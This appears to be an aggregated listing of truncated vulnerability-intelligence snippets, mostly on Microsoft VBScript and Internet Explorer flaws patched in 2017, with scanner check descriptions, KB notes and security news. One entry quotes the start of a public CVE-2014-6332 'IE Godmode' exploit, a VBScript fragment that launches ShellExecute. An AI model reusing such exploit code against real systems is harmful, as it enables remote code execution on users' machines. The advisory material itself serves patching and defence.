Microsoft Windows Multiple Vulnerabilities (KB4015219)

This host is missing an important security update according to Microsoft security update KB4015219. SPDX-FileCopyrightText: 2017 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier:...

KB4015067: Security Update for the Scripting Engine Memory Corruption Vulnerability (April 2017)

The remote Windows host is missing security update KB4015067. It is, therefore, affected by a flaw in the VBScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a malicious website or open a specially...

Microsoft Fixes 45 Vulnerabilities with new Security Update Guide – says goodbye to Security Bulletins

Today is the first month since 1998 in which Microsoft stopped releasing security bulletins with the familiar MSxx-xxx format and replaced it with the new security update guide. We talked about this change earlier in a few blog posts and finally today it’s time to say good bye to security bulleti...

Microsoft Patches Three Vulnerabilities Under Attack

Microsoft today patched a zero-day Word vulnerability that has been publicly attacked along with deploying fixes for Internet Explorer, Microsoft Edge and Windows 10. In all, nine Microsoft products received updates totaling 45 unique CVEs. Three of the vulnerabilities among Tuesday’s updates,...

Microsoft Internet Explorer Scripting Engine Memory Corruption (CVE-2017-0158)

A Use-After-Free vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an error in the way VBScript engine manipulates the assignment of dynamic-array variables. A remote attacker can exploit this issue by enticing a target victim to open a specially crafted web page...

Microsoft Edge Scripting Engine Information Disclosure (CVE-2017-0208)

An integer overflow vulnerability exists in Microsoft Edge. The vulnerability is due to the way VBScript improperly discloses the contents of its memory. A remote attacker can exploit this issue by enticing a user to open a specially crafted web-page with an affected version of Microsoft Edge...

KB4015219: Windows 10 Version 1511 April 2017 Cumulative Update

The remote Windows 10 version 1511 host is missing security update KB4015219. It is, therefore, affected by multiple vulnerabilities : - An information disclosure vulnerability exists in the open-source libjpeg image processing library due to improper handling of objects in memory. An...

KB4015221: Windows 10 Version 1507 April 2017 Cumulative Update

The remote Windows 10 Version 1507 host is missing security update KB4015221. It is, therefore, affected by multiple vulnerabilities : - An information disclosure vulnerability exists in the open-source libjpeg image processing library due to improper handling of objects in memory. An...

CVE-2017-0049

The VBScript engine in Microsoft Internet Explorer 11 allows remote attackers to obtain sensitive information from process memory via a crafted web site, aka "Scripting Engine Information Disclosure Vulnerability." This vulnerability is different from those described in CVE-2017-0018, and...

CVE-2017-0049

The VBScript engine in Microsoft Internet Explorer 11 allows remote attackers to obtain sensitive information from process memory via a crafted web site, aka "Scripting Engine Information Disclosure Vulnerability." This vulnerability is different from those described in CVE-2017-0018, and...

CVE-2017-0049

CVE-2017-0049 affects the VBScript engine in Internet Explorer 11 and is an information-disclosure vulnerability that lets a crafted website obtain sensitive data from process memory. The connected CNVD entry (CNVD-2017-03594) notes a Microsoft Internet Explorer Scripting Engine Information Discl...

CVE-2017-0049

The VBScript engine in Microsoft Internet Explorer 11 allows remote attackers to obtain sensitive information from process memory via a crafted web site, aka "Scripting Engine Information Disclosure Vulnerability." This vulnerability is different from those described in CVE-2017-0018, and...

Microsoft Internet Explorer Multiple Vulnerabilities (4013073)

This host is missing a critical security update according to Microsoft Bulletin MS17-006. SPDX-FileCopyrightText: 2017 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE =...

Microsoft Internet Explorer Remote Code Execution Vulnerability (KB4014661)

This host is missing a critical security update according to Microsoft security updates KB4014661. SPDX-FileCopyrightText: 2017 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier:...

March 14, 2017—KB4013429 (OS Build 14393.953)

March 14, 2017—KB4013429 OS Build 14393.953 Improvements and fixes This update includes quality improvements. No new operating system features are being introduced in this update. Key changes include: Addressed known issue called out in KB3213986. Users may experience delays while running 3D...

IE Godmode remote code execution vulnerability, CVE-2014-6332）

No description provided by source. alliedve.htm // alliewin95+ie3-win10+ie11 dve copy by yuange in 2009. cve-2014-6332 exploit https://twitter.com/yuange75 http://hi.baidu.com/yuange1975 // function runmumaa On Error Resume Next set shell=createobject"Shell.Application" shell.ShellExecute...

Carbanak Using Google Services for Command and Control

Carbanak certainly has not sat idly by after years of advanced criminal campaigns targeting primarily financial institutions. The outfit, alleged to have stolen from more than 100 banks worldwide, has popped up again with a new means of managing command and control over its malware and implants...

MS15-053: Description of the security update for VBScript and JScript 5.7: May 12, 2015

MS15-053: Description of the security update for VBScript and JScript 5.7: May 12, 2015 Summary This security update resolves address space layout randomization ASLR security feature bypasses in the JScript and VBScript scripting engines in Microsoft Windows. An attacker could use one of these AS...

MS12-056: Vulnerability in JScript and VBScript engines could allow remote code execution: August 14, 2012

MS12-056: Vulnerability in JScript and VBScript engines could allow remote code execution: August 14, 2012 INTRODUCTION Microsoft has released security bulletin MS12-056. To view the complete security bulletin, go to one of the following Microsoft websites: Home users:...

MS15-126: Description of the security update for VBScript 5.7: December 8, 2015

MS15-126: Description of the security update for VBScript 5.7: December 8, 2015 Summary This security update fixes vulnerabilities in the VBScript scripting engine in Windows. The more severe of the vulnerabilities could allow remote code execution if an attacker hosts a specially crafted website...